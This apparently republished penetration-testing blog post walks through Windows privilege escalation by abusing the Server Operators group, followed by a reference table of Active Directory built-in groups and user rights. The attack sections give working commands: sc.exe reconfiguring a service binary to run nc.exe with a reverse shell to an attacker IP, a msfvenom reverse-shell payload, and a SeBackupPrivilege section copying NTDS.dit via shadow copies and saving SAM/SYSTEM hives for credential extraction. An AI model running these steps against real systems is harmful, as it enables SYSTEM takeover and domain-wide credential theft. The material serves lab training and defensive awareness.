Windows group server operators — Ваш верный помощник с OS Windows

In this blog, we dive into a Server Operator exploit scenario for Windows Privilege Escalation, leveraging the commonly overlooked but powerful Server Operator group in Active Directory. This Server Operator exploit allows attackers to escalate privileges to NT AUTHORITY\SYSTEM. You’ll learn step-by-step exploitation methods, lab configuration, and effective mitigation strategies.

The Windows Server operating system uses two types of security principals for authentication and authorization: user accounts and computer accounts. These accounts are created to represent physical entities, such as people or computers, and can be used to assign permissions to access resources or perform specific tasks. Additionally, security groups are created to include user accounts, computer accounts, and other groups, in order to make it easier to manage permissions. The system comes pre-configured with certain built-in accounts and security groups, which are equipped with the necessary rights and permissions to carry out functions.

Table of Content:

Introduction to windows privileged groups
Server Operator group summary
Lab configuration
Vulnerability Analysis
Exploitation Method 1
Exploitation Method 2
Remediation
Conclusion

Introduction to windows privileged groups

In Active Directory, privileged groups are also known as security groups. Security groups are collections of user accounts that have similar security requirements. By placing user accounts into appropriate security groups, administrators can grant or deny access to network resources in bulk. Security groups can be used to grant or deny access to network resources, such as shared folders, printers, and applications. They can also be used to assign permissions to user accounts, such as the ability to create, delete, or modify files.

Active Directory also provides features to help administrators manage and secure privileged groups. For example, administrators can enable Group Policy Objects (GPOs) to manage the permissions of privileged groups. GPOs can be applied to a specific group of users or to the entire domain. Additionally, administrators can use the Local Users and Groups snap-in to control the membership of privileged groups. This snap-in can be used to add or remove user accounts from privileged groups, as well as modify the permissions of those groups. For more about windows security groups feel free to visit Microsoft official documentation page:

https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-groups

Server operator group summary

The Server Operator group is a special user group that often has access to powerful commands and settings on a computer system. This group is typically used for managing a server or for troubleshooting system problems. Server Operators are usually responsible for monitoring the server’s performance, managing system security, and providing technical support to users. They may also oversee installing software updates, creating and maintaining user accounts, and performing routine maintenance tasks.

Lab Configuration

Let’s configure the lab on the server to apply theory and escalated windows server privileges. Go to server manager dashboard then click on “Tools” then select “Active Directory Users and Computers”.

We are going to add a user aarti to the active directory security group for the demonstration. To do that, go to “users” select “aarti” and click on “properties”.

Картинка с сайта: www.hackingarticles.in

That will open a new window where we need to click on the “ member of “ tab and then click on the “add” button to add user to any specific group.

A new window will open where we need to select object types as “Groups or Built-in security principals” and select location to domain name which is “ignite. local” here. Then, we need to enter object name which is the group to that we wish to add user to. In this case, we are using the server operators’ group then click ok.

We can verify whether a user is added to the server operators’ group by simply clicking on the members of tab. Here, we can see that we have successfully added user aarti to server operators’ group.

We end up with our lab set up here and logged in as low privileged user in the server where we can see user aarti is in the server operators’ group. In this example, we have connected to the compromised host using the winrm service using the evil-winrm tool. To check group permission, we can simply use the inbuilt command “net user <username>”, it will show what groups the current user belongs to. To reproduce the concept, please follow the commands below:

evil-winrm -I 192.168.1.16 -u aarti -p Ignite@987
net user aarti

Vulnerability Analysis

The Server Operator exploit is a commonly overlooked attack path that can provide SYSTEM-level access in Windows environments.

Being a member of server operator group is not a vulnerability, but the member of this group has special privileges to make changes in the domain which could lead an attacker to escalate to system privilege. We listed services running on the server by issuing “services” command in our terminal where we can see list of services are there. Then we noted the service name “VMTools” and service binary path for lateral usage.

Картинка с сайта: www.hackingarticles.in

Exploitation Method 1

Then we transferred netcat.exe binary to the compromised host and changed the binary path of the service. The reason we are changing the binary path is to receive a reverse connection as system user from the compromised hosts.

How it works?

When we start any service then it will execute the binary from its binary path. So if we replace the service binary with netcat or reverse shell binary. Then, it will give us a reverse shell as a system user because the service is starting as a system on the compromised host. Please note, we need to specify the attacker’s IP address and listening port number with the netcat binary.

Steps to reproduce the POC:

upload /usr/share/windows-binaries/nc.exe
sc.exe config VMTools binPath="C:\Users\aarti\Documents\nc.exe -e cmd.exe 192.168.1.205 1234"

Then we will stop the service and start it again. So, this time when service starts, it will execute the binary that we have set in set earlier. Please, set up a netcat listener on the kali system to receive system shell before starting service and service start and stop commands from compromised hosts.

nc -lvp 1234
sc.exe stop VMTools
sc.exe start VMTools

We have received a reverse shell from the compromised host as nt authority\system. To verify it simply run “whoami” command.

Exploitation Method 2

In this method, we are going to use Metasploit reverse shell binary instead of using nc.exe. Let’s create a msfvenom reverse shell binary and save it as shell.exe. Let’s break out the commands we used to create msfvenom reverse shell binary payload. Here we have selected payload type which is based on the target host operating system (windows/x64/shell_reverse_tcp), then lhost and lport which is listening to host (Attacker IP) and listening port (8888) in our case, lastly, we issue filetype with -f flag which will save our payload in exe format and saved it as shell.exe.

msfvenom -p windows/x64/shell/reverse_tcp lhost=192.168.1.205 lport=8888 -f exe > shell.exe

Once we create the reverse shell payload binary then we will upload it to the compromised system. We have our binary saved in the in the root directory, it is possible that it might be different in your case.

upload /root/shell.exe

Then we will do the same steps we did in method one. Here we do not need to provide the IP address of the attacker machine as it is already there in the shell.exe binary. The concept is the same, just we have changed the binary here, so we do not have to specify the listening IP and port number while setting the service binary path. To reproduce the POC follow the below commands:

sc.exe config VMTools binPath="C:\Users\aarti\Documents\shell.exe"
sc.exe stop VMTools
sc.exe start VMTools

Please note: Make sure you have turned on the netcat listener on port 8888 on the kali system to receive the reverse connection as system.

As we have changed the service binary path to shell.exe path. Now if we call that service, it will execute shell.exe instead of its own binary which will send a connection back to kali system as nt authority\system.

Here we can see, we have successfully received a reverse connection as a system user in the netcat listener.

Картинка с сайта: www.hackingarticles.in

Remediation

There are multiple factors and ways which can help to hardening the system.

Restrict access to privileged accounts:
To begin with, restricting access to privileged accounts to a few trusted individuals is essential. Monitor privileged accounts consistently for any suspicious activity to maintain security.

Use strong passwords:
Additionally, always use strong passwords for all privileged accounts, and change them regularly to reduce the risk of unauthorized access.

Use two-factor authentication:
Moreover, implement two-factor authentication for every privileged account to ensure only authorized individuals can gain access.

Monitor privileged accounts:
Likewise, continuously monitor privileged accounts for suspicious behavior, such as unauthorized access attempts or the execution of unusual commands.

Implement role-based access controls:
Furthermore, implement role-based access controls to restrict privileged account access strictly to those who need it, limiting permissions to essential functions only.

Regularly audit user accounts:
In the same vein, conduct regular audits of user accounts to verify that only authorized users can access privileged accounts.

Limit remote access:
Similarly, limit remote access to privileged accounts only to necessary personnel and monitor their access consistently to detect potential threats.

Harden systems:
Finally, harden systems by applying security patches regularly, using antivirus solutions, and enforcing least privilege policies to minimize exploitation risks.

Thank you for giving your precious time to read this walkthrough. I hope you have enjoyed and learned something new today. Happy Hacking!

Conclusion

Security professionals must be aware of the Server Operator exploit when performing privilege escalation assessments.

We have explored the windows privileged group briefly and its special privileges which can allow an attacker to gain system privilege in any enterprise network. We have explored multiple techniques to exploit windows security group privileges. Lastly, we unpacked it with remediations to help businesses and enterprises to secure their network. I hope you have learned something new today. Happy hacking!

Real-world demonstrations of the Server Operator exploit show how critical group misconfigurations can lead to full system compromise.

Author: Subhash Paudel is a Penetration Tester and a CTF player who has a keen interest in various technologies and loves to explore more and more. Additionally, he is a technical writer at Hacking articles. Contact here: Linkedin and Twitter

Источник

Groups, user rights and permissions in Windows and Active Directory

Default groups and special identities in an Active Directory

Table of all built-in users, default groups and special identities in an Active Directory (original source)

Default Group	Default User or Session owner	Special Identity	Description
Access Control Assistance Operators			Remotely query authorization attributes and permissions for resources on the computer. BuiltIn Local. Default User Rights: None
Account Operators			Grants limited account creation privileges to a user. Members of this group can create and modify most types of accounts, including those of users, local groups, and global groups, and members can log in locally to domain controllers. Members of the Account Operators group cannot manage the Administrator user account, the user accounts of administrators, or the Administrators, Server Operators, Account Operators, Backup Operators, or Print Operators groups. Members of this group cannot modify user rights. Default User Rights: Allow log on locally: SeInteractiveLogonRight
	Administrator		A user account for the system administrator. This account is the first account created during Operating System installation. The account cannot be deleted or locked out. It is a member of the Administrators group and cannot be removed from that group.
Administrators			A built-in group . Grants complete and unrestricted access to the computer, or if the computer is promoted to a domain controller, members have unrestricted access to the domain. This group cannot be renamed, deleted, or moved. This built-in group controls access to all the domain controllers in its domain, and it can change the membership of all administrative groups. Membership can be modified by members of the following groups: the default service Administrators, Domain Admins in the domain, or Enterprise Admins. The group is the default owner of any object that is created by a member of the group. Default User Rights for Administrators
Allowed RODC Password Replication Group			Manage a RODC password replication policy. The Denied RODC Password Replication Group group contains a variety of high-privilege accounts and security groups. The Denied RODC Password Replication group supersedes the Allowed RODC Password Replication group. Default User Rights: None
		Anonymous Logon	A user who has logged on anonymously. This identity allows anonymous access to resources, such as a web page that is published on corporate servers. Default User Rights: None
		Authenticated Users	A group that includes all users whose identities were authenticated when they logged on. Membership is controlled by the Operating System. This identity allows access to shared resources within the domain, such as files in a shared folder that should be accessible to all the workers in the organization. Default User Rights: Access this computer from the network: SeNetworkLogonRight Add workstations to domain: SeMachineAccountPrivilege (Often removed in environments that have an IT administrator.) Bypass traverse checking: SeChangeNotifyPrivilege
Backup Operators			A built-in group. By default, the group has no members. Backup Operators can back up and restore all files on a computer, regardless of the permissions that protect those files. Backup Operators also can log on to the computer and shut it down. Default User Rights: Allow log on locally: SeInteractiveLogonRight Back up files and directories: SeBackupPrivilege Log on as a batch job: SeBatchLogonRight Restore files and directories: SeRestorePrivilege Shut down the system: SeShutdownPrivilege
		Batch	Any user or process that accesses the system as a batch job (or through the batch queue) has the Batch identity. This identity allows batch jobs to run scheduled tasks, such as a nightly cleanup jobMembership is controlled by the Operating System. Default User Rights: None
Certificate Service DCOM Access			Members of this group are allowed to connect to certification authorities in the enterprise. Default User Rights: None
Cert Publishers			A global group that includes all computers that are running an enterprise certificate authority. Cert Publishers are authorized to publish certificates for User objects in Active Directory. Default User Rights: None
Cert Server Admins			Certificate Authority Administrators — authorized to administer certificates for User objects in Active Directory. (Domain Local)
Cert Requesters			Members can request certificates (Domain Local)
Cloneable Domain Controllers			Members of the Cloneable Domain Controllers group that are domain controllers may be cloned. Default User Rights: None
Cryptographic Operators			Members of this group are authorized to perform cryptographic operations. This security group was added in Windows Vista Service Pack 1 (SP1) to configure Windows Firewall for IPsec in Common Criteria mode. Default User Rights: None
		Creator Group	The person who created the file or the directory is a member of this special identity group. Windows Server Operating Systems use this identity to automatically grant access permissions to the creator of a file or directory. A placeholder security identifier (SID) is created in an inheritable access control entry (ACE). When the ACE is inherited, the system replaces this SID with the SID for the primary group of the object’s current owner. The primary group is used only by the Portable Operating System Interface for UNIX (POSIX) subsystem. Default User Rights: None
		Creator Owner	The person who created the file or the directory is a member of this special identity group. Windows Server Operating Systems use this identity to automatically grant access permissions to the creator of a file or directory. A placeholder SID is created in an inheritable ACE. When the ACE is inherited, the system replaces this SID with the SID for the object’s current owner.
Denied RODC Password Replication Group			Members of the Denied RODC Password Replication group cannot have their passwords replicated to any Read-only domain controller. The purpose of this security group is to manage a RODC password replication policy. This group contains a variety of high-privilege accounts and security groups. Default User Rights: None
Device Owners			This group is not currently used in Windows. Default User Rights: Allow log on locally: SeInteractiveLogonRight Access this computer from the network: SeNetworkLogonRight Bypass traverse checking: SeChangeNotifyPrivilege Change the time zone: SeTimeZonePrivilege
		Dialup	Any user who accesses the system through a dial-up connection has the Dial-Up identity. This identity distinguishes dial-up users from other types of authenticated users.
		Digest Authentication	Default User Rights: None
Distributed COM Users			Members of the Distributed COM Users group are allowed to launch, activate, and use Distributed COM objects on the computer. Default User Rights: None
DnsAdmins (installed with DNS)			Members of this group have administrative access to the DNS Server service. The default permissions are as follows: Allow: Read, Write, Create All Child objects, Delete Child objects, Special Permissions. This group has no default members. Default User Rights: None
DnsUpdateProxy (installed with DNS)			Members of this group are DNS clients that can perform dynamic updates on behalf of other clients, such as DHCP servers. This group has no default members. Default User Rights: None
Domain Admins			A global group whose members are authorized to administer the domain. By default, the Domain Admins group is a member of the Administrators group on all computers that have joined a domain, including the domain controllers. Domain Admins is the default owner of any object that is created in the domain’s Active Directory by any member of the group. If members of the group create other objects, such as files, the default owner is the Administrators group. Default User Rights: as Administrators
Domain Computers			A global group that includes all computers that have joined the domain, excluding domain controllers. Default User Rights: None
Domain Controllers			A global group that includes all domain controllers in the domain. New domain controllers are added to this group automatically. Default Default User Rights: None
Domain Guests			A global group that, by default, has only one member, the domain’s built-in Guest account. Default User Rights: See ‘Guests’
Domain Users			A global group that, by default, includes all user accounts in a domain. When you create a user account in a domain, it is added to this group automatically. Default User Rights: See ‘Users’
Enterprise Admins			A group that exists only in the root domain of an Active Directory forest of domains. It is a universal group if the domain is in native mode, a global group if the domain is in mixed mode. The group is authorized to make forest-wide changes in Active Directory, such as adding child domains. By default, the only member of the group is the Administrator account for the forest root domain. Default User Rights: See Administrators See Denied RODC Password Replication Group
Enterprise Key Admins			Members of this group can perform administrative actions on key objects within the forest. The Enterprise Key Admins group was introduced in Windows Server 2016. Default User Rights: None
Enterprise Read-Only Domain Controllers			Members of this group are Read-Only Domain Controllers in the enterprise. Except for account passwords, a Read-only domain controller holds all the Active Directory objects and attributes that a writable domain controller holds. Default User Rights: None
		Enterprise Domain Controllers	A group that includes all domain controllers an Active Directory directory service forest of domains. Membership is controlled by the Operating System. Default User Rights: Access this computer from the network: SeNetworkLogonRight Allow log on locally: SeInteractiveLogonRight
Event Log Readers			Members of this group can read event logs from local computers. The group is created when the server is promoted to a domain controller. Default User Rights: None
		Everyone	All interactive, network, dial-up, and authenticated users are members of the Everyone group. This special identity group gives wide access to system resources. Whenever a user logs on to the network, the user is automatically added to the Everyone group. On computers running Windows 2000 and earlier, the Everyone group included the Anonymous Logon group as a default member, but as of Windows Server 2003, the Everyone group contains only Authenticated Users and Guest; and it no longer includes Anonymous Logon by default (although this can be changed). Membership is controlled by the Operating System. Default User Rights: Access this computer from the network: SeNetworkLogonRight Act as part of the Operating System: SeTcbPrivilege Bypass traverse checking: SeChangeNotifyPrivilege
Group Policy Creators Owners			A global group that is authorized to create new Group Policy objects in Active Directory. By default, the only member of the group is Administrator. The default owner of a new Group Policy object is usually the user who created it. If the user is a member of Administrators or Domain Admins, all objects that are created by the user are owned by the group. Owners have full control of the objects they own. Default User Rights: See ‘Denied RODC Password Replication Group’.
	Guest		A user account for people who do not have individual accounts. This user account does not require a password. By default, the Guest account is disabled.
Guests			A built-in group. By default, the only member is the Guest account. The Guests group allows occasional or one-time users to log on with limited privileges to a computer’s built-in Guest account. When a member of the Guests group signs out, the entire profile is deleted. This includes everything that is stored in the %userprofile% directory, including the user’s registry hive information, custom desktop icons, and other user-specific settings. This implies that a guest must use a temporary profile to sign in to the system. Default User Rights: None
Hyper-V Administrators			Members of the Hyper-V Administrators group have complete and unrestricted access to all the features in Hyper-V. Adding members to this group helps reduce the number of members required in the Administrators group, and further separates access. Introduced in Windows Server 2012. Default User Rights: None
IIS_IUSRS			IIS_IUSRS is a built-in group that is used by Internet Information Services beginning with IIS 7.0. A built-in account and group are guaranteed by the Operating System to always have a unique SID. IIS 7.0 replaces the IUSR_MachineName account and the IIS_WPG group with the IIS_IUSRS group to ensure that the actual names that are used by the new account and group will never be localized. Default User Rights: None
Incoming Forest Trust Builders			Members of the Incoming Forest Trust Builders group can create incoming, one-way trusts to this forest. Active Directory provides security across multiple domains or forests through domain and forest trust relationships. This group cannot be renamed, deleted, or moved. Default User Rights: None
Key Admins			Members of this group can perform administrative actions on key objects within the domain. Default User Rights: None
		Interactive	Any user who is logged on to the local system has the Interactive identity. This identity allows only local users to access a resource. Whenever a user accesses a given resource on the computer to which they are currently logged on, the user is automatically added to the Interactive group. Membership is controlled by the Operating System. Default User Rights: None
	KRBTGT		A service account that is used by the Key Distribution Center (KDC) service.
		Local Service	The Local Service account is similar to an Authenticated User account. The Local Service account has the same level of access to resources and objects as members of the Users group. This limited access helps safeguard your system if individual services or processes are compromised. Services that run as the Local Service account access network resources as a null session with anonymous credentials. The name of the account is NT AUTHORITY\LocalService. This account does not have a password. Default User Rights: Adjust memory quotas for a process: SeIncreaseQuotaPrivilege Bypass traverse checking: SeChangeNotifyPrivilege Change the system time: SeSystemtimePrivilege Change the time zone: SeTimeZonePrivilege Create global objects: SeCreateGlobalPrivilege Generate security audits: SeAuditPrivilege Impersonate a client after authentication: SeImpersonatePrivilege Replace a process level token: SeAssignPrimaryTokenPrivilege
		Local System	This is a service account that is used by the Operating System. The LocalSystem account is a powerful account that has full access to the system and acts as the computer on the network. If a service logs on to the LocalSystem account on a domain controller, that service has access to the entire domain. Some services are configured by default to log on to the LocalSystem account. Do not change the default service setting. The name of the account is LocalSystem. This account does not have a password. Default User Rights: None
		Network	This group implicitly includes all users who are logged on through a network connection. Any user who accesses the system through a network has the Network identity. This identity allows only remote users to access a resource. Whenever a user accesses a given resource over the network, the user is automatically added to the Network group. Membership is controlled by the Operating System. Default User Rights: None
		Network Service	The Network Service account is similar to an Authenticated User account. The Network Service account has the same level of access to resources and objects as members of the Users group. This limited access helps safeguard your system if individual services or processes are compromised. Services that run as the Network Service account access network resources by using the credentials of the computer account. The name of the account is NT AUTHORITY\NetworkService. This account does not have a password. Default User Rights: Adjust memory quotas for a process: SeIncreaseQuotaPrivilege Bypass traverse checking: SeChangeNotifyPrivilege Create global objects: SeCreateGlobalPrivilege Generate security audits: SeAuditPrivilege Impersonate a client after authentication: SeImpersonatePrivilege Restore files and directories: SeRestorePrivilege Replace a process level token: SeAssignPrimaryTokenPrivilege
Network Configuration Operators			Members of this group can make changes to TCP/IP settings, Rename/Enable/disable LAN connections,Delete/rename remote access connections, enter the PIN unblock key (PUK) for mobile broadband devices that support a SIM card and renew and release TCP/IP addresses on domain controllers in the domain. This group has no default members. Default User Rights: None
		NTLM Authentication	Default User Rights: None
		Other Organization	This group implicitly includes all users who are logged on to the system through a dial-up connection. Membership is controlled by the Operating System. Default User Rights: None
Performance Monitor Users			Members of this group can monitor performance counters on domain controllers in the domain, locally and from remote clients without being a member of the Administrators or Performance Log Users groups. Default User Rights: None
Performance Log Users			Members of this group can manage performance counters, logs and alerts on domain controllers in the domain, locally and from remote clients without being a member of the Administrators group. Default User Rights: Log on as a batch job: SeBatchLogonRight
Power Users			By default, members of this group have no more user rights or permissions than a standard user account. The Power Users group did once grant users specific admin rights and permissions in previous versions of Windows.
Pre-Windows 2000 Compatible Access			A backward compatibility group which allows read access on all users and groups in the domain. By default, the special identity Everyone is a member of this group. Add users to this group only if they are running Windows NT 4.0 or earlier. Default User Rights: Access this computer from the network: SeNetworkLogonRight Bypass traverse checking: SeChangeNotifyPrivilege
		Principal Self or Self	This identify is a placeholder in an ACE on a user, group, or computer object in Active Directory. When you grant permissions to Principal Self, you grant them to the security principal that is represented by the object. During an access check, the Operating System replaces the SID for Principal Self with the SID for the security principal that is represented by the object. Default User Rights: None
Print Operators			A built-in group that exists only on domain controllers. By default, the only member is the Domain Users group. Print Operators can manage printers and document queues. They can also manage Active Directory printer objects in the domain. Members of this group can locally sign in to and shut down domain controllers in the domain. Because members of this group can load and unload device drivers on all domain controllers in the domain, add users with caution. This group cannot be renamed, deleted, or moved. Default User Rights: Allow log on locally: SeInteractiveLogonRight Load and unload device drivers: SeLoadDriverPrivilege Shut down the system: SeShutdownPrivilege
Protected Users			Members of the Protected Users group are afforded additional protection against the compromise of credentials during authentication processes. This security group is designed as part of a strategy to effectively protect and manage credentials within the enterprise. Members of this group automatically have non-configurable protection applied to their accounts. Membership in the Protected Users group is meant to be restrictive and proactively secure by default. The only method to modify the protection for an account is to remove the account from the security group. This group was introduced in Windows Server 2012 R2. Default User Rights: None
RAS and IAS Servers			Servers in this group are permitted access to the remote access properties of users. A domain local group . By default, this group has no members. Computers that are running the Routing and Remote Access service are added to the group automatically. Members of this group have access to certain properties of User objects, such as Read Account Restrictions, Read Logon Information, and Read Remote Access Information. Default User Rights: None
RDS Endpoint Servers			Servers that are members in the RDS Endpoint Servers group can run virtual machines and host sessions where user RemoteApp programs and personal virtual desktops run. This group needs to be populated on servers running RD Connection Broker. Session Host servers and RD Virtualization Host servers used in the deployment need to be in this group. Default User Rights: None
RDS Management Servers			Servers that are members in the RDS Management Servers group can be used to perform routine administrative actions on servers running Remote Desktop Services. This group needs to be populated on all servers in a Remote Desktop Services deployment. The servers running the RDS Central Management service must be included in this group. Default User Rights: None
RDS Remote Access Servers			Servers in the RDS Remote Access Servers group provide users with access to RemoteApp programs and personal virtual desktops. In Internet facing deployments, these servers are typically deployed in an edge network. This group needs to be populated on servers running RD Connection Broker. RD Gateway servers and RD Web Access servers that are used in the deployment need to be in this group. Default User Rights: None
Read-Only Domain Controllers			This group is comprised of the Read-only domain controllers in the domain. A Read-only domain controller makes it possible for organizations to easily deploy a domain controller in scenarios where physical security cannot be guaranteed, such as branch office locations, or in scenarios where local storage of all domain passwords is considered a primary threat, such as in an extranet or in an application-facing role. Default User Rights See ‘Denied RODC Password Replication Group’.
Remote Desktop Users			The Remote Desktop Users group on an RD Session Host server is used to grant users and groups permissions to remotely connect to an RD Session Host server. This group cannot be renamed, deleted, or moved. It appears as a SID until the domain controller is made the primary domain controller and it holds the operations master role (also known as flexible single master operations or FSMO). Default User Rights: None
		Remote Interactive Logon	This identity represents all users who are currently logged on to a computer by using a Remote Desktop connection. This group is a subset of the Interactive group. Access tokens that contain the Remote Interactive Logon SID also contain the Interactive SID. Default User Rights: None
Remote Management Users			Members of the Remote Management Users group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user. The Remote Management Users group is generally used to allow users to manage servers through the Server Manager console, whereas the WinRMRemoteWMIUsers_ group is allows remotely running Windows PowerShell commands. Default User Rights: None
Replicator			Computers that are members of the Replicator group support file replication in a domain. Windows Server Operating Systems use the File Replication service (FRS) to replicate system policies and logon scripts stored in the System Volume (SYSVOL). The DFS Replication service is a replacement for FRS, and it can be used to replicate the contents of a SYSVOL shared resource, DFS folders, and other custom (non-SYSVOL) data. You should migrate all non-SYSVOL FRS replica sets to DFS Replication. Default User Rights: None
		Restricted	Users and computers with restricted capabilities have the Restricted identity. This identity group is used by a process that is running in a restricted security context, such as running an application with the RunAs service. When code runs at the Restricted security level, the Restricted SID is added to the user’s access token. Default User Rights: None
		SChannel Authentication	Default User Rights: None
Schema Admins			A group that exists only in the root domain of an Active Directory forest of domains. It is a universal group if the domain is in native mode , a global group if the domain is in mixed mode . The group is authorized to make schema changes in Active Directory. By default, the only member of the group is the Administrator account for the forest root domain. Because this group has significant power in the forest, add users with caution. Default User Rights: See ‘Denied RODC Password Replication Group’.
Server Operators			A built-in group that exists only on domain controllers. By default, the group has no members. Server Operators can log on to a server interactively; create and delete network shares; start and stop services; back up and restore files; format the hard disk of the computer; and shut down the computer. Default User Rights: Allow log on locally: SeInteractiveLogonRight Back up files and directories: SeBackupPrivilege Change the system time: SeSystemTimePrivilege Change the time zone: SeTimeZonePrivilege Force shutdown from a remote system: SeRemoteShutdownPrivilege Restore files and directories SeRestorePrivilege Shut down the system: SeShutdownPrivilege
		Service	Any service that accesses the system has the Service identity. This identity group includes all security principals that are signed in as a service. This identity grants access to processes that are being run by Windows Server services. Membership is controlled by the Operating System. Default User Rights: Create global objects: SeCreateGlobalPrivilege Impersonate a client after authentication: SeImpersonatePrivilege
Storage Replica Administrators			Members of this group have complete and unrestricted access to all features of Storage Replica. Default User Rights: None
System Managed Accounts Group			Members of this group are managed by the system. Default User Rights: None
Terminal Server License Servers			Members of the Terminal Server License Servers group can update user accounts in Active Directory with information about license issuance. This is used to track and report TS Per User CAL usage. A TS Per User CAL gives one user the right to access a Terminal Server from an unlimited number of client computers or devices. This group appears as a SID until the domain controller is made the primary domain controller and it holds the operations master role (also known as flexible single master operations or FSMO). Default User Rights: None
		Terminal Server Users	Any user accessing the system through Terminal Services has the Terminal Server User identity. This identity allows users to access Terminal Server applications and to perform other necessary tasks with Terminal Server services. Membership is controlled by the Operating System. Default User Rights: None
		This Organization	Default User Rights: None
Users			A built-in group. After the initial installation of the Operating System, the only member is the Authenticated Users group. When a computer joins a domain, the Domain Users group is added to the Users group on the computer. Users can perform tasks such as running applications, using local and network printers, shutting down the computer, and locking the computer. Users can install applications that only they are allowed to use if the installation program of the application supports per-user installation. This group cannot be renamed, deleted, or moved. Default User Rights: None
Windows Authorization Access Group			Members of this group have access to the computed token GroupsGlobalAndUniversal attribute on User objects. Some applications have features that read the token-groups-global-and-universal (TGGAU) attribute on user account objects or on computer account objects in Active Directory Domain Services. Default User Rights: None
		Window Manager\Window Manager Group	Default User Rights: Bypass traverse checking: SeChangeNotifyPrivilege Increase a process working set: SeIncreaseWorkingSetPrivilege
WinRMRemoteWMIUsers_			In Windows 8 and in Windows Server 2012, a Share tab was added to the Advanced Security Settings user interface. This tab displays the security properties of a remote file share. To view this information, you must have the following permissions and memberships, as appropriate for the version of Windows Server that the file server is running. The WinRMRemoteWMIUsers_ group allows running PowerShell commands remotely whereas the ‘Remote Management Users’ group is generally used to allow users to manage servers by using the Server Manager console. This security group was introduced in Windows Server 2012. Default User Rights: None

User rights and Privileges

Name of Constant	User Right in Group Policy
SeTrustedCredManAccessPrivilege	Access Credential Manager as a trusted caller
SeNetworkLogonRight	Access this computer from the network
SeTcbPrivilege	Act as part of the operating system
SeMachineAccountPrivilege	Add workstations to domain
SeIncreaseQuotaPrivilege	Adjust memory quotas for a process
SeInteractiveLogonRight	Allow log on locally
SeRemoteInteractiveLogonRight	Allow log on through Terminal Services
SeBackupPrivilege	Back up files and directories
SeChangeNotifyPrivilege	Bypass traverse checking
SeSystemtimePrivilege	Change the system time
SeTimeZonePrivilege	Change the time zone
SeCreatePagefilePrivilege	Create a pagefile
SeCreateTokenPrivilege	Create a token object
SeCreateGlobalPrivilege	Create global objects
SeCreatePermanentPrivilege	Create permanent shared objects
SeCreateSymbolicLinkPrivilege	Create symbolic links
SeDebugPrivilege	Debug programs
SeDenyNetworkLogonRight	Deny access to this computer from the network
SeDenyBatchLogonRight	Deny log on as a batch job
SeDenyServiceLogonRight	Deny log on as a service
SeDenyInteractiveLogonRight	Deny log on locally
SeDenyRemoteInteractiveLogonRight	Deny log on through Terminal Services
SeEnableDelegationPrivilege	Enable computer and user accounts to be trusted for delegation
SeRemoteShutdownPrivilege	Force shutdown from a remote system
SeAuditPrivilege	Generate security audits
SeImpersonatePrivilege	Impersonate a client after authentication
SeIncreaseWorkingSetPrivilege	Increase a process working set
SeIncreaseBasePriorityPrivilege	Increase scheduling priority
SeLoadDriverPrivilege	Load and unload device drivers
SeLockMemoryPrivilege	Lock pages in memory
SeBatchLogonRight	Log on as a batch job
SeServiceLogonRight	Log on as a service
SeSecurityPrivilege	Manage auditing and security log
SeRelabelPrivilege	Modify an object label
SeSystemEnvironmentPrivilege	Modify firmware environment values
SeManageVolumePrivilege	Perform volume maintenance tasks
SeProfileSingleProcessPrivilege	Profile single process
SeSystemProfilePrivilege	Profile system performance
SeUndockPrivilege	Remove computer from docking station
SeAssignPrimaryTokenPrivilege	Replace a process level token
SeRestorePrivilege	Restore files and directories
SeShutdownPrivilege	Shut down the system
SeSyncAgentPrivilege	Synchronize directory service data
SeTakeOwnershipPrivilege	Take ownership of files or other objects

Microsoft reference

What are my privileges

Show our current group memberships:

Backup Operators Group

Abusing SeBackupPrivilege

If we are members of the Backup Operators group, we will be given the SeBackup and SeRestore privileges. The SeBackupPrivilege allows us to traverse any folder and list the folder contents.

In order to exploit SeBackupPrivilege you have to:

Enable the privilege.
This alone lets you traverse (cd into) any1 directory, local or remote, and list (dir, Get-ChildItem) its contents.
If you want to read/copy data out of a «normally forbidden» folder, you have to act as a backup software. The shell copy command won’t work; you’ll need to open the source file manually using CreateFile making sure to specify the FILE_FLAG_BACKUP_SEMANTICS flag.

We will use this PoC: https://github.com/giuliano108/SeBackupPrivilege

git clone https://github.com/giuliano108/SeBackupPrivilege.git
# Library fileds are located at /SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug

1. Open Powershell in the target machine, copy the library binaries and import the required libraries:

Import-Module .\SeBackupPrivilegeUtils.dll
import-Module .\SeBackupPrivilegeCmdLets.dll

2. Check privs and group memberships:

whoami /priv
whoami /groups

3. If SeBackupPrivilege is present, double check if it is enabled:

4. If disabled, enable it (and check it back):

Set-SeBackupPrivilege
Get-SeBackupPrivilege
whoami /priv

5. Now the privilege is enabled and it can be now leveraged to copy any protected file (not to read it).

dir C:\Confidential\
Copy-FileSeBackupPrivilege 'C:\Confidential\2021 Contract.txt' .\Contract.txt
cat 'C:\Confidential\2021 Contract.txt'

Abusing the local logging to a domain controller with diskshadow

This group also permits logging in locally to a domain controller. The active directory database NTDS.dit is a very attractive target, as it contains the NTLM hashes for all user and computer objects in the domain.

1. As the NTDS.dit file is locked by default, we can use the Windows diskshadow utility to create a shadow copy of the C drive and expose it as E drive. The NTDS.dit in this shadow copy won’t be in use by the system.ll

diskshadow.exe

Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC,  10/14/2020 12:57:52 AM

DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit

dir E:

2. Next, we can use the Copy-FileSeBackupPrivilege cmdlet to bypass the ACL and copy the NTDS.dit locally.

Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit

See Attacking sam and Attacking ntds for extracting the credentials.

Backing up SAM and SYSTEM Registry Hives

The SeBackupPrivilege also lets us back up the SAM and SYSTEM registry hives:

reg save HKLM\SYSTEM SYSTEM.SAV
reg save HKLM\SAM SAM.SAV

With this, we can extract local account credentials offline using a tool such as Impacket’s secretsdump.py.

See more techniques at the Attacking sam and Attacking ntds pages, both for extracting the hives and then also for cracking the credentials, for instance:

Alternative #1: vssadmin (locally)
Alternative #2: crackmapexec (remotely)
Alternative #3: DSInternals module (locally)
